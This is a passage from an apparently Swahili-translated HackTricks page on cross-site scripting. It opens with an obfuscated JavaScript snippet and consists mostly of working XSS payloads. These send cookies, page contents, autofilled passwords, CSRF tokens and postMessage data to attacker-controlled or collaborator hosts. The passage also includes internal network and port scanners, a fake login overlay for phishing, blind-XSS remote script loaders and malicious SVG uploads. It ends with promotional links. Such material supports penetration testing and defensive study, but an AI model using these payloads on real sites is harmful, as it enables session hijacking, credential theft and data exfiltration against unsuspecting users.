ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');
```

```javascript
// It's also possible to execute JS code only with the chars: []`+!${}
```
## XSS mizigo ya kawaida

### Mzigo wa mizigo kadhaa

{% content-ref url="steal-info-js.md" %}
[steal-info-js.md](steal-info-js.md)
{% endcontent-ref %}

### Pata Vidakuzi
```javascript
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
{% hint style="info" %}
Hutaweza **kupata upatikanaji wa vidakuzi kutoka JavaScript** ikiwa bendera ya HTTPOnly imewekwa kwenye kuki. Lakini hapa una [njia kadhaa za kuzidisha ulinzi huu](../hacking-with-cookies/#httponly) ikiwa una bahati ya kutosha.
{% endhint %}

### Pora Yaliyomo ya Ukurasa
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open('GET', url, true);
xhr.send(null);
```
### Pata IPs za ndani
```html
<script>
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for(i=1;i<=255;i++){
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i<=n_threads; i++){
if(q.length) q.shift()();
}

function fetchUrl(url, wait){
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") && q.length) {
q.shift()();
}
});

setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
}
</script>
```
### Scanner ya Bandari (pata)
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
```
### Scanner ya Bandari (websockets)
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}
```
_Muda mfupi unaashiria bandari inayojibu_ _Muda mrefu unaashiria kukosa majibu._

Pitia orodha ya bandari zilizopigwa marufuku kwenye Chrome [**hapa**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc) na kwenye Firefox [**hapa**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).

### Kisanduku cha kuomba sifa za kibali
```markup
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
```
### Kupata Ujazo wa Maneno ya Siri kiotomatiki
```javascript
<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
Wakati wowote data yoyote inawekwa kwenye uga wa nenosiri, jina la mtumiaji na nenosiri hutumwa kwa seva ya mshambuliaji, hata kama mteja anachagua nenosiri lililohifadhiwa na hawajaandika chochote, maelezo ya kuingia yatachukuliwa.

### Keylogger

Kwa kutafuta tu kwenye github nilipata kadhaa tofauti:

* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
* Unaweza pia kutumia metasploit `http_javascript_keylogger`

### Kuiba vitambulisho vya CSRF
```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
### Kuiba ujumbe wa PostMessage
```markup
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>
```
### Kudhuru Wafanyakazi wa Huduma

{% content-ref url="abusing-service-workers.md" %}
[abusing-service-workers.md](abusing-service-workers.md)
{% endcontent-ref %}

### Kupata Shadow DOM

{% content-ref url="shadow-dom.md" %}
[shadow-dom.md](shadow-dom.md)
{% endcontent-ref %}

### Polyglots

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}

### Mzigo wa Blind XSS

Unaweza pia kutumia: [https://xsshunter.com/](https://xsshunter.com)
```markup
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
### Regex - Pata Maudhui Yaliyofichwa

Kutoka [**hapa**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) inawezekana kujifunza kwamba hata kama baadhi ya thamani zinaondoka kutoka kwenye JS, bado inawezekana kuzipata katika sifa za JS katika vitu tofauti. Kwa mfano, kuingiza REGEX bado inawezekana kuzipata baada ya thamani ya kuingiza ya regex kuondolewa:
```javascript
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);

// Remove flag value, nobody will be able to get it, right?
flag=""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
```
### Orodha ya Kujaribu Nguvu

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}

## XSS Kutumia Ubaguzi Mwingine wa Usalama

### XSS katika Markdown

Je! Unaweza kuingiza nambari ya Markdown ambayo itaonyeshwa? Labda unaweza kupata XSS! Angalia:

{% content-ref url="xss-in-markdown.md" %}
[xss-in-markdown.md](xss-in-markdown.md)
{% endcontent-ref %}

### XSS hadi SSRF

Je! Umepata XSS kwenye **tovuti inayotumia caching**? Jaribu **kuiboresha kuwa SSRF** kupitia Uvamizi wa Kuingiza Kando ya Edge Side na mzigo huu:
```python
<esi:include src="http://yoursite.com/capture" />
```
Tumia hiyo kukiuka vizuizi vya kuki, vichujio vya XSS na mengi zaidi!\
Taarifa zaidi kuhusu mbinu hii hapa: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).

### XSS katika PDF iliyoundwa kwa njia ya kudumu

Ikiwa ukurasa wa wavuti unazalisha PDF kwa kutumia kuingiza inayodhibitiwa na mtumiaji, unaweza kujaribu **kudanganya bot** ambayo inaunda PDF kutekeleza **msimbo wa JS wa kupindukia**.\
Kwa hivyo, ikiwa **boti ya muundaji wa PDF inapata** aina fulani ya **vitambulisho vya HTML**, ita**tuma** vitambulisho hivyo, na unaweza **kutumia** tabia hii kusababisha **Server XSS**.

{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
{% endcontent-ref %}

Ikiwa huwezi kuingiza vitambulisho vya HTML inaweza kuwa na thamani ya kujaribu **kuingiza data ya PDF**:

{% content-ref url="pdf-injection.md" %}
[pdf-injection.md](pdf-injection.md)
{% endcontent-ref %}

### XSS katika Amp4Email

AMP, ikilenga kuharakisha utendaji wa ukurasa wa wavuti kwenye vifaa vya rununu, inajumuisha vitambulisho vya HTML vilivyosaidiwa na JavaScript kuhakikisha utendaji kwa kuzingatia kasi na usalama. Inasaidia anuwai ya vipengee kwa huduma mbalimbali, inayopatikana kupitia [vipengee vya AMP](https://amp.dev/documentation/components/?format=websites).

Muundo wa [**AMP kwa Barua pepe**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) unapanua vipengee maalum vya AMP kwa barua pepe, kuruhusu wapokeaji kuingiliana na yaliyomo moja kwa moja ndani ya barua pepe zao.

Mfano wa [**maandishi XSS katika Amp4Email kwenye Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).

### XSS kupakia faili (svg)

Pakia kama picha faili kama ifuatavyo (kutoka [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
```markup
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
```

```markup
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
```

```markup
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
```

```svg
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>
```

```html
<svg><use href="//portswigger-labs.net/use_element/upload.php#x"/></svg>
```

```xml
<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
```
Pata **mizigo zaidi ya SVG** katika [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)

## Mbinu za JS za Kipekee & Taarifa Husika

{% content-ref url="other-js-tricks.md" %}
[other-js-tricks.md](other-js-tricks.md)
{% endcontent-ref %}

## Vyanzo vya XSS

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
* [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list)
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Ikiwa una nia katika **kazi ya udukuzi** na kudukua yasiyoweza kudukuliwa - **tunakupa kazi!** (_inahitajika uwezo wa kuzungumza na kuandika Kipolishi kwa ufasaha_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>